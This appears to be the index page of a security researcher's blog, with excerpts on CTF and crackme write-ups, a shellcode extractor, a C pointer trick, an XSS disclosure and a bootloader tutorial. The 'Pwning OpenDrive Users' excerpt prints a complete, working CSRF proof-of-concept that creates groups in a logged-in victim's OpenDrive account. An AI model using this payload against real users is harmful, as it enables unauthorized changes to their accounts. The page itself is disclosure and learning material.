This tool will extract the opcodes from the .text section and display in different hex formats for different syntaxes. Works only with valid PE files. Coded in C++Builder XE5.
Download: https://github.com/OsandaMalith/ShellCode-Extractor/releases
Latest Blog Posts
2014 Flare On Challenge 2
You can download the challenge from here : http://www.flare-on.com/files/C2.zip
The zip file contains a html file and an image as the logo of the html file inside the img folder.
If we open the image in a hex editor we can see at the end it contains PHP code.
Share this:
2014 Flare On Challenge 1
You can download the challenge from here: http://www.flare-on.com/files/C1.exe
As we run the application we get this.
When we click on decode the we get this encrypted string.
Share this:
Hiding Data Inside Memory Addresses
This is a small finding I found while I was experimenting on pointers in C. Usually in C the arithmetic on pointers depend on the size of the data types. If we initialize a int variable, the compiler will allocate 4 bytes in memory since its 32 bits. I assume you are well aware of these basics in C 🙂 I wanted to store data inside the empty addresses allocated by int data type. This is a bit challenging in a high level programming language. Of course using inline assembly I could have achieved this. But I wanted to achieve this using native C operators.
To understand this let’s begin from a simple approach.
|
1 2 3 4 5 6 7 8 9 10 |
#include <stdio.h> int main() { unsigned int var = 100; unsigned int var2 = 200; printf("%u\n",var); printf("%u\n",var2); } |
Share this:
2015 in review
The WordPress.com stats helper monkeys prepared a 2015 annual report for this blog.
Here’s an excerpt:
Madison Square Garden can seat 20,000 people for a concert. This blog was viewed about 69,000 times in 2015. If it were a concert at Madison Square Garden, it would take about 3 sold-out performances for that many people to see it.
Click here to see the complete report.
Share this:
Rootme No software breakpoints Cracking Challenge
Here is another very interesting challenge from Rootme. The title says ELF – no software breakpoints.
Let’s run the file command and see.
% file ch20.bin ch20.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
The executable seemed to be striped.
Next I examined the sections in file and the .text section starts at 0x08048080
This is the disassembly of the text section. I spent some time trying to understand the logic. Well let’s see what this is 🙂
(more…)
Share this:
Pwning OpenDrive Users
After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.
If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.
XSRF in Creating Groups
[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.opendrive.com/ajax", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
(more…)
Share this:
Newbie Keygenning 1
This is a random very old crackme I found when I was bored with assignments, which is pretty easy and thought of sharing with you. Doing crackmes one by one 😀 Download: https://www.mediafire.com/?351rp7o9qmf97js
After opening in Olly and checking the string references we can see the congratulations string.
After following the string we see the following disassembly.
Share this:
Informatica Reflected XSS
This is old vulnerability I found in Informatica and got fixed recently. Honestly I’ve been a bit away from bug hunting due to studies and all. Well, stay tuned, found some cool bugs in few sites and products. Will disclose shortly 🙂
Share this:
Writing a Bootloader
What is a Bootloader?
A bootloader is a special program that is executed each time a bootable device is initialized by the computer during its power on or reset that will load the kernel image into the memory. This application is very close to hardware and to the architecture of the CPU. All x86 PCs boot in Real Mode. In this mode you have only 16-bit instructions. Our bootloader runs in Real Mode and our bootloader is a 16-bit program.
https://manybutfinite.com/img/boot/bootProcess.png
How this works?
When you switch on the PC the BIOS want to boot up an OS which must be found somewhere in hard disks, floppy disk, CDs, etc. The order in which BIOS searches an OS is user configurable. Next the BIOS reads the first 512 byte sector of the bootable disk. Usually a sector is 512 bytes in size. This is known as the Master Boot Record (MBR). BIOS simply loads the contents of the MBR into memory location “0x7c00” and jumps to that location to start executing whatever code is in the MBR. Our bootloader should be 512 bytes in size as well.
https://manybutfinite.com/img/boot/masterBootRecord.png
(more…)
